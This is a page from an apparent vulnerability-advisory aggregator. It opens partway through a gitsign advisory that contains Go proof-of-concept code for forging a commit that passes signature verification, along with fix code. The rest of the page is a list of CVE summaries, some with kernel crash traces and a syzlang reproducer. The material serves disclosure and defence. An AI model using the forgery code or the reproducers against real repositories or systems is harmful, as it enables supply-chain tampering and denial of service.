committer, msg) id := &identity{cert: cert, priv: priv} resp, err := signature.Sign(context.Background(), id, []byte(canonicalData), signature.SignOptions{Detached: true, Armor: true, IncludeCerts: 0}) if err != nil { panic(err) } // Craft malformed raw commit: first=treeFirst (git-core), second=treeSecond (go-git) malformedRaw := fmt.Sprintf("tree %s\ntree %s\n%s\n%s\n%s\n%s", treeFirst, treeSecond, author, committer, indentSig(string(resp.Signature)), msg) st := memory.NewStorage() enc := st.NewEncodedObject() enc.SetType(plumbing.CommitObject) w, _ := enc.Writer() _, _ = w.Write([]byte(malformedRaw)) _ = w.Close() c, err := object.DecodeCommit(st, enc) if err != nil { panic(err) } // Reproduce what gitsign verify does out := new(plumbing.MemoryObject) if err := c.EncodeWithoutSignature(out); err != nil { panic(err) } r, _ := out.Reader() verifyData, _ := io.ReadAll(r) roots := x509.NewCertPool() roots.AddCert(cert) v, _ := ggit.NewCertVerifier(ggit.WithRootPool(roots)) _, verr := v.Verify(context.Background(), verifyData, []byte(c.PGPSignature), true) objHash, oerr := ggit.ObjectHash(verifyData, []byte(c.PGPSignature)) rawObj := &plumbing.MemoryObject{} rawObj.SetType(plumbing.CommitObject) _, _ = rawObj.Write([]byte(malformedRaw)) fmt.Println("FIRST_TREE_IN_RAW (git-core):", treeFirst) fmt.Println("SECOND_TREE_IN_RAW (go-git):", treeSecond) fmt.Println("GO_GIT_PARSED_TREE:", c.TreeHash.String()) fmt.Println("VERIFY_DATA_EQUALS_CANONICAL:", string(verifyData) == canonicalData) fmt.Println("CERT_VERIFY_ERROR:", verr) // nil = signature accepted fmt.Println("OBJECTHASH_ERROR:", oerr) fmt.Println("OBJECTHASH_FROM_VERIFY_DATA:", objHash) fmt.Println("RAW_MALFORMED_COMMIT_HASH:", rawObj.Hash().String()) // differs from objHash } ``` **Expected output:** ``` FIRST_TREE_IN_RAW (git-core): aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa SECOND_TREE_IN_RAW (go-git): bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb GO_GIT_PARSED_TREE: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb VERIFY_DATA_EQUALS_CANONICAL: true CERT_VERIFY_ERROR: <nil> ← signature accepted OBJECTHASH_ERROR: <nil> OBJECTHASH_FROM_VERIFY_DATA: <hash of canonical form> RAW_MALFORMED_COMMIT_HASH: <different hash> ← hash mismatch confirms split ``` - **Signature binding bypass**: `gitsign verify` reports a valid signature from a trusted identity for a commit that git-core resolves to completely different content (a different tree). - **Signature replay without a key**: An attacker can reuse any existing gitsign-signed commit to produce a new commit that passes `gitsign verify` but points to attacker-controlled content, without possessing any signing key. - **Rekor tlog inconsistency**: `ObjectHash` also goes through the go-git round-trip, so the hash stored in or looked up from the transparency log is the normalized hash, not the raw object hash. An auditor cross-referencing the tlog hash against the actual object store will see a mismatch. - **Verification path divergence**: `git verify-commit` and `gitsign verify` reach opposite verdicts for the same malformed commit, undermining auditability. Change the `gitsign verify` and `gitsign verify-tag` CLI commands to read the raw object bytes from the git object store and strip the signature header manually, mirroring what git-core does and what `commandVerify` already does when called by `git verify-commit`: ```go // internal/commands/verify/verify.go - replace lines 63-92 enc, err := repo.Storer.EncodedObject(plumbing.CommitObject, *h) if err != nil { return fmt.Errorf("error reading encoded commit object: %w", err) } r, err := enc.Reader() if err != nil { return err } rawBytes, err := io.ReadAll(r) if err != nil { return err } data, sig, err := git.ExtractSignatureFromRawObject(rawBytes) if err != nil { return err } // data is now the raw bytes without the gpgsig header - identical to what git-core passes summary, err := v.Verify(ctx, data, sig, true) ``` This aligns the CLI verification path with the `commandVerify` (git verify-commit) path that already handles raw bytes correctly. Add a pre-verification check in `ObjectHash` and in the verification path that rejects objects with duplicate field headers (duplicate `tree`, `parent`, `author`, `committer`), returning an error rather than silently normalizing: ```go func validateRawCommitFields(data []byte) error { seen := map[string]bool{} for _, line := range bytes.Split(data, []byte("\n")) { if idx := bytes.IndexByte(line, ' '); idx > 0 { key := string(line[:idx]) if seen[key] { return fmt.Errorf("malformed commit: duplicate field %q", key) } seen[key] = true } if len(line) == 0 { break // end of headers } } return nil } ``` This is a defense-in-depth measure but does not address the fundamental architectural issue of verifying re-encoded bytes. This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).

Canonical Authentication Bypass Suse +1
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in MCP Registry's catalogue UI allows any user with a publish token to inject arbitrary event handlers via the `websiteUrl` field by breaking out of an `href` attribute with an unescaped double-quote character. The server-side URL validator accepts quotes and the client-side `escapeHtml` helper fails to encode them in attribute context, enabling attackers to execute JavaScript on the registry.modelcontextprotocol.io origin with access to localStorage, XHR, and auth tokens. Vendor-released patch version 1.7.7 available; actively confirmed via proof-of-concept.

Canonical XSS Microsoft
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Consensus failure in Zebra nodes before 4.3.1 allows remote attackers to trigger network partitioning by submitting V4 or V5 transactions with invalid sighash hash types. After a refactoring removed critical validation logic from C++ FFI code, Zebra failed to enforce consensus rules restricting hash type values in transparent transaction signatures, creating divergence from zcashd nodes. Attackers can exploit this remotely without authentication (CVSS:4.0 AV:N/AC:L/PR:N) to partition the Zcash network and enable potential double-spend attacks. No public exploit identified at time of analysis, but GitHub advisory (GHSA-8m29-fpq5-89jj) confirms the attack mechanism and vendor-released patches are available.

Canonical Information Disclosure
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in PromptHub 0.4.9 through 0.5.3 allows authenticated users to bypass IPv6 address validation and probe internal network resources. The /api/skills/fetch-remote endpoint accepts user-supplied URLs and fetches them server-side, reflecting up to 5 MB of response data. Flawed IPv6 validation allows attackers to reach RFC1918 private networks, loopback addresses, and link-local destinations using IPv4-mapped IPv6 hex representations and alternate ::1 notations. When ALLOW_REGISTRATION=true (a documented configuration), any internet user can register and exploit this vulnerability. Vendor-released patch: version 0.5.4. EPSS data not available; no evidence of active exploitation (not in CISA KEV).

Canonical SSRF
NVD GitHub
EPSS 0% CVSS 2.3
LOW PATCH Monitor

OpenClaw before version 2026.4.15 allows authenticated users with access to the memory tool to read arbitrary Markdown files within the workspace root by bypassing path restrictions in the QMD backend's memory_get function. The vulnerability enables attackers to access workspace Markdown files outside canonical memory locations or indexed QMD result sets, effectively circumventing the intended memory-path policy. No public exploit code or active exploitation has been identified.

Canonical Authentication Bypass
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Double-free memory corruption in Linux kernel's Xen 9P filesystem driver (9p/xen) allows adjacent network attackers to crash the kernel or potentially execute arbitrary code. The xenwatch thread racing with back-end state changes triggers use-after-free during teardown of xen_9pfs_front_free(), causing general protection faults. Vendor patches available for mainline 7.0 and stable branches 6.19.6, 6.18.16, and 6.12.75. EPSS score of 0.02% (5th percentile) suggests low exploitation probability in the wild; no public exploit or CISA KEV listing at time of analysis.

Canonical Denial Of Service Linux +2
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Null pointer dereference in Linux kernel bridge VLAN filtering code allows local authenticated attackers to trigger a denial of service via a crafted RTM_NEWLINK netlink message with BR_BOOLOPT_FDB_LOCAL_VLAN_0 flag when CONFIG_BRIDGE_VLAN_FILTERING is disabled. The vulnerability occurs because br_fdb_delete_locals_per_vlan_port() and br_fdb_insert_locals_per_vlan_port() dereference a NULL vlan group pointer without validation, causing a kernel panic. No public exploit code identified at time of analysis.

Canonical Denial Of Service Null Pointer Dereference +3
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

Stored HTML injection in AVideo's notifySubscribers endpoint allows any authenticated uploader to broadcast platform-branded phishing emails to up to 10,000 channel subscribers without sanitization, escaping, or rate limits. The attacker-supplied HTML is injected directly into the email template via str_replace and rendered by PHPMailer, arriving with the platform's official contact email address, logo, and site title, enabling credential theft and reconnaissance at scale with no visible indication that content originated from an uploader rather than the platform operator.

Canonical XSS PHP +1
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

Microsoft RCE Google +3
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Authentication bypass in Traefik Proxy's ForwardAuth and snippet-based authentication middleware allows remote unauthenticated attackers to access protected routes by exploiting incomplete header sanitization. Traefik sanitizes canonical forwarded headers (X-Forwarded-Proto) but fails to strip underscore-based aliases (X_Forwarded_Proto). When authentication backends normalize these header variants equivalently, attackers can inject spoofed trust context through alias headers to satisfy authentication checks without valid credentials. Patches released for versions 2.11.43, 3.6.14, and 3.7.0-rc.2. No public exploit identified at time of analysis, though the detailed technical disclosure in the GitHub advisory provides sufficient implementation details for reproduction.

Authentication Bypass Canonical
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: media: vidtv: fix NULL pointer dereference in vidtv_channel_pmt_match_sections syzbot reported a general protection fault in vidtv_psi_desc_assign [1]. vidtv_psi_pmt_stream_init() can return NULL on memory allocation failure, but vidtv_channel_pmt_match_sections() does not check for this. When tail is NULL, the subsequent call to vidtv_psi_desc_assign(&tail->descriptor, desc) dereferences a NULL pointer offset, causing a general protection fault. Add a NULL check after vidtv_psi_pmt_stream_init(). On failure, clean up the already-allocated stream chain and return. [1] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:vidtv_psi_desc_assign+0x24/0x90 drivers/media/test-drivers/vidtv/vidtv_psi.c:629 Call Trace: <TASK> vidtv_channel_pmt_match_sections drivers/media/test-drivers/vidtv/vidtv_channel.c:349 [inline] vidtv_channel_si_init+0x1445/0x1a50 drivers/media/test-drivers/vidtv/vidtv_channel.c:479 vidtv_mux_init+0x526/0xbe0 drivers/media/test-drivers/vidtv/vidtv_mux.c:519 vidtv_start_streaming drivers/media/test-drivers/vidtv/vidtv_bridge.c:194 [inline] vidtv_start_feed+0x33e/0x4d0 drivers/media/test-drivers/vidtv/vidtv_bridge.c:239

Canonical Null Pointer Dereference Linux +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

{2} has completed and can't rollack state). If KVM_SEV_INIT{2} fails, KVM can end up trying to add to a not-yet-initialized sev->regions_list, e.g. triggering a #GP Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 110 UID: 0 PID: 72717 Comm: syz.15.11462 Tainted: G U W O 6.16.0-smp-DEV #1 NONE Tainted: [U]=USER, [W]=WARN, [O]=OOT_MODULE Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 12.52.0-0 10/28/2024 RIP: 0010:sev_mem_enc_register_region+0x3f0/0x4f0 ../include/linux/list.h:83 Code: <41> 80 3c 04 00 74 08 4c 89 ff e8 f1 c7 a2 00 49 39 ed 0f 84 c6 00 RSP: 0018:ffff88838647fbb8 EFLAGS: 00010256 RAX: dffffc0000000000 RBX: 1ffff92015cf1e0b RCX: dffffc0000000000 RDX: 0000000000000000 RSI: 0000000000001000 RDI: ffff888367870000 RBP: ffffc900ae78f050 R08: ffffea000d9e0007 R09: 1ffffd4001b3c000 R10: dffffc0000000000 R11: fffff94001b3c001 R12: 0000000000000000 R13: ffff8982ab0bde00 R14: ffffc900ae78f058 R15: 0000000000000000 FS: 00007f34e9dc66c0(0000) GS:ffff89ee64d33000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe180adef98 CR3: 000000047210e000 CR4: 0000000000350ef0 Call Trace: <TASK> kvm_arch_vm_ioctl+0xa72/0x1240 ../arch/x86/kvm/x86.c:7371 kvm_vm_ioctl+0x649/0x990 ../virt/kvm/kvm_main.c:5363 __se_sys_ioctl+0x101/0x170 ../fs/ioctl.c:51 do_syscall_x64 ../arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x6f/0x1f0 ../arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f34e9f7e9a9 Code: <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f34e9dc6038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007f34ea1a6080 RCX: 00007f34e9f7e9a9 RDX: 0000200000000280 RSI: 000000008010aebb RDI: 0000000000000007 RBP: 00007f34ea000d69 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 00007f34ea1a6080 R15: 00007ffce77197a8 </TASK> with a syzlang reproducer that looks like: syz_kvm_add_vcpu$x86(0x0, &(0x7f0000000040)={0x0, &(0x7f0000000180)=ANY=[], 0x70}) (async) syz_kvm_add_vcpu$x86(0x0, &(0x7f0000000080)={0x0, &(0x7f0000000180)=ANY=[@ANYBLOB="..."], 0x4f}) (async) r0 = openat$kvm(0xffffffffffffff9c, &(0x7f0000000200), 0x0, 0x0) r1 = ioctl$KVM_CREATE_VM(r0, 0xae01, 0x0) r2 = openat$kvm(0xffffffffffffff9c, &(0x7f0000000240), 0x0, 0x0) r3 = ioctl$KVM_CREATE_VM(r2, 0xae01, 0x0) ioctl$KVM_SET_CLOCK(r3, 0xc008aeba, &(0x7f0000000040)={0x1, 0x8, 0x0, 0x5625e9b0}) (async) ioctl$KVM_SET_PIT2(r3, 0x8010aebb, &(0x7f0000000280)={[...], 0x5}) (async) ioctl$KVM_SET_PIT2(r1, 0x4070aea0, 0x0) (async) r4 = ioctl$KVM_CREATE_VM(0xffffffffffffffff, 0xae01, 0x0) openat$kvm(0xffffffffffffff9c, 0x0, 0x0, 0x0) (async) ioctl$KVM_SET_USER_MEMORY_REGION(r4, 0x4020ae46, &(0x7f0000000400)={0x0, 0x0, 0x0, 0x2000, &(0x7f0000001000/0x2000)=nil}) (async) r5 = ioctl$KVM_CREATE_VCPU(r4, 0xae41, 0x2) close(r0) (async) openat$kvm(0xffffffffffffff9c, &(0x7f0000000000), 0x8000, 0x0) (async) ioctl$KVM_SET_GUEST_DEBUG(r5, 0x4048ae9b, &(0x7f0000000300)={0x4376ea830d46549b, 0x0, [0x46, 0x0, 0x0, 0x0, 0x0, 0x1000]}) (async) ioctl$KVM_RUN(r5, 0xae80, 0x0) Opportunistically use guard() to avoid having to define a new error label and goto usage.

Linux Google Null Pointer Dereference +4
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free in Linux kernel Open vSwitch module causes system crash when deleting network interfaces on PREEMPT_RT kernels. The vulnerability is confirmed patched in multiple stable kernel versions (5.10.253, 5.15.203, 6.1.168, 6.6.131, 6.12.80, 6.18.21, 6.19.11, 7.0) with upstream fixes available via kernel.org commits. EPSS score of 0.02% (7th percentile) indicates very low exploitation likelihood. No active exploitation confirmed (not in CISA KEV). Local authenticated access required (CVSS AV:L/PR:L) with high impact (CVSS 7.8), but exploitation depends on PREEMPT_RT kernel configuration and specific Open vSwitch teardown race conditions.

Canonical Information Disclosure Linux +1
NVD VulDB
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Canonical Livepatch snap client prior to 10.15.0 allows local unprivileged users to obtain a root-level authentication token via an unauthenticated request to the livepatchd.sock Unix domain socket, enabling attackers to impersonate the victim and access Livepatch services on systems with an active Ubuntu Pro subscription.

Authentication Bypass Ubuntu Canonical
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Kyverno's apiCall service helper automatically injects the controller's ServiceAccount token into HTTP requests when ClusterPolicy or GlobalContextEntry authors omit an Authorization header, enabling token exfiltration to attacker-controlled endpoints via confused deputy vulnerability. Affects deployments where policy YAML repositories are compromised (GitOps threat model) or ClusterPolicy creation is possible. CVSS 8.1 (High) reflects network attack vector with low complexity and low privileges required. No CISA KEV listing or public exploit identified at time of analysis, but GitHub advisory includes working proof-of-concept demonstrating token injection and exfiltration.

Code Injection Kubernetes Canonical
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel's netfilter x_tables subsystem allows a local attacker with CAP_NET_ADMIN privileges to crash the system by loading an NFPROTO_UNSPEC-registered xt_match or xt_target (e.g., xt_devgroup) into an ARP nftables chain via nft_compat, triggering a kernel panic and complete availability loss. CVSS 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) accurately reflects the local-only, availability-only impact, and EPSS at 0.02% (7th percentile) indicates very low real-world exploitation probability. No active exploitation confirmed (not in CISA KEV); vendor-released patches are available across multiple stable kernel branches.

Linux Null Pointer Dereference Denial Of Service +1
NVD VulDB
Page 1 of 3 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy